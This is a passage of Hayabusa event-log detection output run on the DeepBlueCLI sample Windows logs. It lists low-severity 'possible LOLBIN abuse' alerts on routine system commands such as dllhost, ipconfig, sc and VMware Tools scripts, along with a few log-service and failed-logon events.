9282016-09-03 23:53:23.408 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9292016-09-04 00:52:11.006 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9302016-09-04 06:19:44.532 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9312016-09-04 06:19:44.676 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9322016-09-04 06:19:44.692 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9332016-09-04 06:21:44.528 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9342016-09-04 06:27:33.432 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9352016-09-04 06:34:52.733 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9362016-09-04 06:34:54.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9372016-09-04 06:35:14.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9382016-09-04 06:35:14.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9392016-09-04 06:35:15.773 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9402016-09-04 06:35:16.101 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9412016-09-04 06:35:29.507 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9422016-09-04 06:35:29.601 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9432016-09-04 06:35:40.667 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Wallpaper\autologon.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6frules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9442016-09-04 06:35:46.165 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6frules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9452016-09-04 06:36:24.719 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9462016-09-04 06:36:26.520 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9472016-09-04 06:48:30.867 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\RunDll32.exe" "C:\Windows\system32\WerConCpl.dll", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9drules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9482016-09-04 07:57:17.289 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9492016-09-04 07:57:39.909 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9502016-09-04 08:03:14.642 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9512016-09-04 08:03:14.751 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9522016-09-04 22:32:04.123 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9532016-09-04 22:32:05.218 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9542016-09-04 22:32:05.234 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9552016-09-04 22:32:05.439 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9562016-09-04 22:32:15.400 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9572016-09-04 22:32:23.091 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9582016-09-04 23:37:56.230 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9592016-09-04 23:37:59.307 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9602016-09-04 23:39:22.859 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9612016-09-04 23:39:28.137 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9622016-09-05 00:10:41.119 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9632016-09-05 00:10:41.316 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9642016-09-15 11:13:20.120 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9652016-09-15 11:13:20.122 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9662016-09-15 11:13:21.221 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9672016-09-15 11:13:21.470 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9682016-09-15 11:13:30.470 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9692016-09-15 12:28:48.887 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9702016-09-15 12:28:49.170 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9712016-09-15 23:50:16.005 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9722016-09-15 23:50:16.427 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9732016-09-15 23:50:25.279 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9742016-09-16 00:01:09.025 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9752016-09-16 00:01:09.291 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9762016-09-16 05:09:57.316 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9772016-09-16 05:09:57.628 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9782016-09-16 05:28:03.628 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9792016-09-16 05:28:03.894 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9802016-09-18 07:53:42.990 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9812016-09-18 07:53:44.147 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9822016-09-18 07:53:44.490 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9832016-09-18 07:53:53.459 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9842016-09-18 07:56:17.454 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9852016-09-18 07:56:31.000 +09:00IE10Win76006infoEvent Log Service Stoppedrules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9862016-09-18 07:56:46.000 +09:00IE10Win76005infoEvent Log Service Startedrules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
9872016-09-18 07:56:46.000 +09:00IE10Win74625mediumInitAccess | PersisFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
9882016-09-18 07:56:47.806 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9892016-09-18 07:56:48.165 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9902016-09-18 07:57:01.618 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9912016-09-18 07:57:01.696 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
9922016-09-18 07:57:03.862 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Wallpaper\autologon.bat" " | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
